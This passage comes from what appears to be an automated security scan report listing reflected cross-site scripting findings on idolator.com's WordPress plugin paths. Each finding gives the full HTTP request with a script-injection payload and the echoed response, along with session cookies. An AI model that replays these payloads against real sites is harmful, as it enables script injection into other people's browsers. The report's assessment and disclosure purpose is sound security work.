<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins389d7\"><script>alert(1)</script>6059268cfdb/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.147. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d47"><script>alert(1)</script>9b30164d27d was submitted in the REST URL parameter 3. This input was echoed as d1d47\"><script>alert(1)</script>9b30164d27d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgetsd1d47"><script>alert(1)</script>9b30164d27d/js/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:29 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgetsd1d47\"><script>alert(1)</script>9b30164d27d/js/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.148. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50bea"><script>alert(1)</script>d444ad713dd was submitted in the REST URL parameter 4. This input was echoed as 50bea\"><script>alert(1)</script>d444ad713dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js50bea"><script>alert(1)</script>d444ad713dd/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:42 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js50bea\"><script>alert(1)</script>d444ad713dd/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.149. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926b2"><script>alert(1)</script>9cac7e6f268 was submitted in the REST URL parameter 5. This input was echoed as 926b2\"><script>alert(1)</script>9cac7e6f268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js926b2"><script>alert(1)</script>9cac7e6f268?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:54 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js926b2\"><script>alert(1)</script>9cac7e6f268?ver=2.8.6" />
...[SNIP]...

4.150. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd33c"><script>alert(1)</script>f640e7cc530 was submitted in the REST URL parameter 1. This input was echoed as cd33c\"><script>alert(1)</script>f640e7cc530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentcd33c"><script>alert(1)</script>f640e7cc530/plugins/wp-facebookconnect/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:36 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contentcd33c\"><script>alert(1)</script>f640e7cc530/plugins/wp-facebookconnect/xd_receiver.php" />
...[SNIP]...

4.151. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf26"><script>alert(1)</script>ddacd7a0384 was submitted in the REST URL parameter 2. This input was echoed as 6cf26\"><script>alert(1)</script>ddacd7a0384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins6cf26"><script>alert(1)</script>ddacd7a0384/wp-facebookconnect/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:47 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins6cf26\"><script>alert(1)</script>ddacd7a0384/wp-facebookconnect/xd_receiver.php" />
...[SNIP]...

4.152. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22af8"><script>alert(1)</script>b845d5fbef6 was submitted in the REST URL parameter 3. This input was echoed as 22af8\"><script>alert(1)</script>b845d5fbef6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-facebookconnect22af8"><script>alert(1)</script>b845d5fbef6/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:58 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-facebookconnect22af8\"><script>alert(1)</script>b845d5fbef6/xd_receiver.php" />
...[SNIP]...

4.153. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536a7"><script>alert(1)</script>2d1ae258ddb was submitted in the REST URL parameter 4. This input was echoed as 536a7\"><script>alert(1)</script>2d1ae258ddb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-facebookconnect/xd_receiver.php536a7"><script>alert(1)</script>2d1ae258ddb HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:16 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php536a7\"><script>alert(1)</script>2d1ae258ddb" />
...[SNIP]...

4.154. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 411a7"><script>alert(1)</script>8486c1597cf was submitted in the REST URL parameter 1. This input was echoed as 411a7\"><script>alert(1)</script>8486c1597cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content411a7"><script>alert(1)</script>8486c1597cf/plugins/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:32:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:32:55 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content411a7\"><script>alert(1)</script>8486c1597cf/plugins/wp-polls/polls-css.css?ver=2.50" />
...[SNIP]...

4.155. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef64c"><script>alert(1)</script>8be803bc4d3 was submitted in the REST URL parameter 2. This input was echoed as ef64c\"><script>alert(1)</script>8be803bc4d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsef64c"><script>alert(1)</script>8be803bc4d3/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:07 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/pluginsef64c\"><script>alert(1)</script>8be803bc4d3/wp-polls/polls-css.css?ver=2.50" />
...[SNIP]...

4.156. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb93"><script>alert(1)</script>85680b4efea was submitted in the REST URL parameter 3. This input was echoed as 6eb93\"><script>alert(1)</script>85680b4efea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls6eb93"><script>alert(1)</script>85680b4efea/polls-css.css?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:21 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-polls6eb93\"><script>alert(1)</script>85680b4efea/polls-css.css?ver=2.50" />
...[SNIP]...

4.157. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4e8"><script>alert(1)</script>cade8732198 was submitted in the REST URL parameter 4. This input was echoed as ed4e8\"><script>alert(1)</script>cade8732198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-css.cssed4e8"><script>alert(1)</script>cade8732198?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:32 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-polls/polls-css.cssed4e8\"><script>alert(1)</script>cade8732198?ver=2.50" />
...[SNIP]...

4.158. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e61a3"><script>alert(1)</script>de04ee79223 was submitted in the REST URL parameter 1. This input was echoed as e61a3\"><script>alert(1)</script>de04ee79223 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contente61a3"><script>alert(1)</script>de04ee79223/plugins/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:32:59 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:32:59 -0700
